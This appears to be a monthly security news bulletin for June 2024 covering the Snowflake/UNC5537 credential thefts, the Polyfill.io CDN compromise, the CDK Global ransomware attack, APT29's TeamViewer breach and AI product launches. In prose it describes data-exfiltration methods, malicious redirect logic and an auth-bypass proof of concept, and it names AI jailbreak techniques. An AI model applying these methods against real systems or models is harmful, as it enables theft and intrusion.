Bulletin — June 2024

June is the month SaaS posture moves to the front. Mandiant publishes the report on UNC5537 and the Snowflake wave stops being rumour: 165 confirmed accounts, zero CVE, all lax defaults and credentials that had been living in infostealer logs since 2020. In parallel, Polyfill.io turns out to have been injecting malware for months into >100,000 sites — the domain was sold in February to a Chinese company and nobody looked. CDK Global pays $25 million to BlackSuit and leaves 15,000 dealerships idle for two weeks. APT29 gets inside TeamViewer’s corporate network. And up top, Apple Intelligence + Private Cloud Compute at WWDC and Claude 3.5 Sonnet set the pace of AI in product.

UNC5537 / Snowflake — the report that names the wave

10 June. Mandiant publishes the technical report on UNC5537, the financial cluster behind the Ticketmaster (560M), Santander, Advance Auto Parts (380M), Pure Storage, LendingTree/QuoteWizard, Neiman Marcus, Cleared4 breaches and nearly 160 more organisations. Mandiant and Snowflake confirm having notified 165 entities.

The model is mundane: corporate Snowflake credentials stolen by infostealers (VIDAR, REDLINE, LUMMA, RISEPRO) between 2020 and 2024, authentication against accounts without MFA and without network policy, mass exfil via COPY INTO @stage to attacker-controlled S3. 79.7% of the credentials used had prior exposure in public logs. Some were still valid four years after the initial theft. The actor’s own tool, FROSTBITE (also visible as application_name = rapeflake in query history), automates reconnaissance.

We’ve published the technical analysis of the flow and mitigation. The short reading: Snowflake doesn’t have a bug, it has defaults that for years allowed password-only authentication from any IP. In September the company announces MFA by default for new accounts created from October. Existing ones can still opt-out — the work of auditing and rotating inherited credentials is paid by customer CISOs.

Source: https://cloud.google.com/blog/topics/threat-intelligence/unc5537-snowflake-data-theft-extortion

Polyfill.io — the CDN that had been serving malware for months

25 June. Sansec publishes the warning: cdn.polyfill.io, the library that fills in missing APIs for old browsers and is embedded in hundreds of thousands of sites, has been serving malicious JavaScript to mobile devices since February. The chain: on 24 February Funnull, a Chinese company, acquires the polyfill.io domain and the GitHub account. The original author, Andrew Betts, warns on X (“I never owned the domain and had no influence over the sale”) and recommends removing the inclusion. Almost nobody does.

The payload serves conditional redirects: if the user-agent is mobile, fingerprint indicates the visit isn’t from a suspicious session and there are no devtools open, the site rewrites navigation toward scam and malvertising destinations. Censys counts 384,773 hosts with the script linked in July, including public domains of WarnerBros, Hulu, Mercedes-Benz, JSTOR, Intuit and the World Economic Forum.

Cloudflare and Fastly respond by setting up clean mirrors for customers that don’t migrate in time. Namecheap pulls the domain. The original library had active maintenance from Andrew Betts until 2023; the pattern is the classic of popular package or domain acquisition, low post-sale vigilance, and four months of monetisation before an external researcher (Sansec) catches it.

Reading for 2024: any <script src="https://cdn.<vendor>/..."> not self-hosted or not passed through SRI (integrity hash) is supply chain delegated to the lifecycle of a domain you don’t control.

Source: https://sansec.io/research/polyfill-supply-chain-attack · Censys: https://censys.com/blog/july-2-polyfill-io-supply-chain-attack-digging-into-the-web-of-compromised-domains/

CDK Global — ransomware that halts 15,000 dealerships

18-19 June. CDK Global, SaaS provider of Dealer Management Systems for car dealerships in North America, suffers two consecutive attacks attributed to BlackSuit (offshoot of Royal, itself an offshoot of Conti). The first lands on the night of the 18th and forces CDK to shut down its two data centres at 02:00 ET on the 19th; the second arrives during restoration. 15,000 dealerships are left without sales, financing, registration or service operations. Lithia, Penske, Group 1 Automotive and Sonic Automotive notify the impact in their 8-K filings to the SEC.

Initial demand is $10M. Goes up to $50M. On 21 June, a wallet linked to BlackSuit receives 387 bitcoin ($25M). CDK doesn’t officially confirm payment; CNN and CyberScoop trace the transaction. Full restoration on 4 July. Anderson Economic Group estimates the cost to dealerships at >$1 billion accumulated during the outage.

The operational lesson: sectorial SaaS vendor with functional monopoly (a DMS can’t be replaced in a week) is single point of failure for an entire industry. BlackSuit had done the same with Change Healthcare in February. The pattern wins, other operators will copy it.

Source: https://cyberscoop.com/cdk-ransom-blacksuit-25-million/

TeamViewer — APT29 inside the corporate network

26-28 June. TeamViewer detects anomalous activity on the 26th, contains it, and publishes disclosure on the 28th. Attributes to APT29 / Midnight Blizzard (Russian SVR). Initial vector: a standard employee account, stolen via credential stuffing or reuse. The actor only accesses the corporate IT network — not the product environment, not customer infrastructure. TeamViewer emphasises that segmentation between corporate IT and product environment held.

Compromised data: names, corporate contact data and encrypted employee passwords. No customers, no product telemetry, no remote session data. Coordination with Microsoft to mitigate the risk of the stolen passwords.

APT29 gets into TeamViewer a month after appearing in SolarWinds-CTI logs reviewed by Microsoft and months after Microsoft itself (January, Midnight Blizzard against executives via OAuth abuse) and HPE (May). The group is active and operates against any vendor with a high-trust footprint in enterprise customers.

Source: https://www.teamviewer.com/en/resources/trust-center/statement/ · coverage: https://www.bleepingcomputer.com/news/security/teamviewers-corporate-network-was-breached-in-alleged-apt-hack/

Apple Intelligence + Private Cloud Compute — WWDC

10 June. Apple announces Apple Intelligence in the WWDC keynote. On-device model for local tasks (summarisation, rewriting, Genmoji image generation), larger model on server for inference that doesn’t fit locally. The server, Private Cloud Compute (PCC), is the interesting piece from a security angle.

The design Apple publishes: PCC nodes with Apple silicon proprietary hardware, reduced OS with no shell or remote management capability, cryptographic attestation of the binary running on each node, immutable audit log. The client encrypts the request with the public key of the PCC node it has previously verified; Apple claims to have no access to the request or result. Detailed reading on the technical blog.

The security claims are ambitious — the threat model includes “Apple insider trying to access a user’s requests”. Independent verification remains pending. In July Apple opens a specific bug bounty for PCC with payouts up to $1M.

The contrast with Recall (May, pulled on 7 June after pressure from Beaumont and Forshaw) is deliberate: Apple presents the threat model before the product. Microsoft presented it after.

Source: https://security.apple.com/blog/private-cloud-compute/

Claude 3.5 Sonnet — Anthropic picks up the pace

20 June. Anthropic ships Claude 3.5 Sonnet — mid-tier of the 3.5 family that, per the published benchmarks, beats Claude 3 Opus at half the cost. Available on Claude.ai for free, in API, Bedrock and Vertex AI. 200k token window. $3 / $15 per million input/output tokens.

The interest for security isn’t in the model itself (it’s general purpose, no new security-relevant capabilities) but in the pace. Three months after Claude 3 (4 March), Anthropic ships an iteration that on internal metrics beats the large model. It implies the cadence of adversarial evaluation (internal red-team, safety benchmarks) has to follow the same pace. System prompts and safety classifiers tuned to Claude 3 Opus don’t apply as-is to 3.5 Sonnet, and the difference shows in jailbreak rate with known techniques (many-shot, ArtPrompt).

Source: https://www.anthropic.com/news/claude-3-5-sonnet

Rest of the month

• Microsoft Recall rollback — 7 June. Microsoft announces Recall will no longer be on by default on the Copilot+ PCs shipping on 18 June. Migrates to preview on Windows Insider, requires Windows Hello to enable, adds SQLite encryption via just-in-time decryption, makes the feature opt-in. The timeline matches the two weeks following Kevin Beaumont’s and James Forshaw’s technical analyses — we’ve covered the case in the May technical post.
• AT&T Snowflake-related — partial disclosure in June, full on 12 July. AT&T notifies the SEC that call metadata for approximately 110 million customers was exfiltrated from a Snowflake account. Same UNC5537 pattern — no MFA, no network policy. Disclosure delayed with DoJ authorisation for “national security reasons”.
• LA County Department of Public Health — 17 June disclosure. Phishing against 53 employees in February (compromise on 19-20 February) exposes medical data for 200,000+ people — diagnoses, prescriptions, social security numbers. The attackers access the mailboxes via credentials stolen on a fake landing page. Late disclosure: 4 months between incident and notification.
• CVE-2024-29849, Veeam Backup Enterprise Manager — advisory 21 May, public exposure in June. Auth bypass in the Backup Enterprise Manager web interface (CVSS 9.8): a remote attacker authenticates as any user without credentials. Sina Kheirkhah publishes technical writeup and PoC. Patch: 12.1.2.172. No confirmed mass exploitation at June close, but Veeam is a high value target for ransomware (access to backups = erase the insurance).
• Pure Storage breach — confirmation 11 June. Pure Storage confirms compromise of its Snowflake account. Customer telemetry data (configuration, hostnames, no end-customer data). Another thread of the UNC5537 ball.
• Additional technical bulletins not developed in this post: ServiceNow CVE-2024-4879 + CVE-2024-5217 (input validation + Jelly templating, public exploitation in July), VMware ESXi CVE-2024-37085 (Microsoft ID, AD integration auth bypass used by ransomware).

Pattern of the month

June is the month the operational debate shifts. Through 2023 and the first months of 2024 the conversation about big breaches turned on CVEs in edge appliances (Ivanti, Citrix, Palo Alto, MOVEit). In June 2024 the two events of the month, Snowflake and CDK, have no associated CVE. The first is SaaS posture: lax defaults for years plus infostealers that have been running on enterprise endpoints since 2020. The second is vendor concentration: a sectorial SaaS provider falling and paralysing an entire industry.

Polyfill.io adds a third layer: external dependency supply chain, where the compromise vector is neither a bug nor a default, it’s the change of ownership of a domain nobody monitors. Funnull buys in February, serves malware for four months, an external team (Sansec) catches it almost by accident.

The three lessons cost more than patching an appliance: they require inventorying years-old credentials, evaluating vendor concentration, and auditing external dependencies with SRI or self-hosting. Defence in 2024 stops being a patch cycle and starts looking like a supply chain audit.

July brings CrowdStrike (the technical event of the year) and regreSSHion. See you in 30 days.